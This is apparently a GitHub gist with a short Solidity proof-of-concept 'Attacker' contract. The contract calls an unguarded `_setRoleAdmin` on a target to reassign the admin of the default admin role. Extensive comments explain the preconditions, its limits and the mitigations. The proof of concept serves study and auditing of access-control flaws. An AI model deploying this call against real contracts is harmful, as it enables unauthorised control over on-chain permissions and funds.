
@anytimegaming3
Created March 17, 2024 21:05
// Proof-of-concept caller for an access-control contract that exposes
// `_setRoleAdmin` to external callers without an authorization check.
//
// Preconditions (not shown on this page; confirm against the actual target):
//   - `AccessControl` must resolve to a contract or interface that declares
//     `_setRoleAdmin(bytes32,bytes32)` as public/external. In OpenZeppelin's
//     AccessControl the function is `internal`, so this call does not compile
//     against the unmodified library; the weakness exists only where a derived
//     contract re-exposes it unguarded.
//
// Review / mitigation notes:
//   - Keep `_setRoleAdmin` internal. Any wrapper around it should be restricted,
//     e.g. with `onlyRole(DEFAULT_ADMIN_ROLE)`.
//   - OpenZeppelin's `_setRoleAdmin` emits `RoleAdminChanged`; an unexpected
//     event for role 0x00 is a useful monitoring signal.
contract Attacker {
    // Handle to the contract under test; assigned once in the constructor.
    AccessControl public vulnerableContract;

    /// @param _vulnerableContract Address that is cast to `AccessControl`.
    ///        No check is made that code at this address implements the interface.
    constructor(address _vulnerableContract) {
        vulnerableContract = AccessControl(_vulnerableContract);
    }

    /// @notice Asks the target to make role 1 the admin role of role 0.
    /// @dev Succeeds only if the target performs no caller check. On its own it
    ///      grants no role to the caller; it changes which role administers role 0.
    function exploit() external {
        // The value 1 is this page's assumption for NEW_ADMIN_ROLE. Role ids are
        // commonly `keccak256("NAME")`, not sequential integers; verify on the target.
        bytes32 replacementAdmin = bytes32(uint256(1));

        // 0x00 matches OpenZeppelin's DEFAULT_ADMIN_ROLE constant; it is a fixed
        // value, not "the first role defined".
        bytes32 roleToReconfigure = bytes32(uint256(0));

        vulnerableContract._setRoleAdmin(roleToReconfigure, replacementAdmin);
    }
}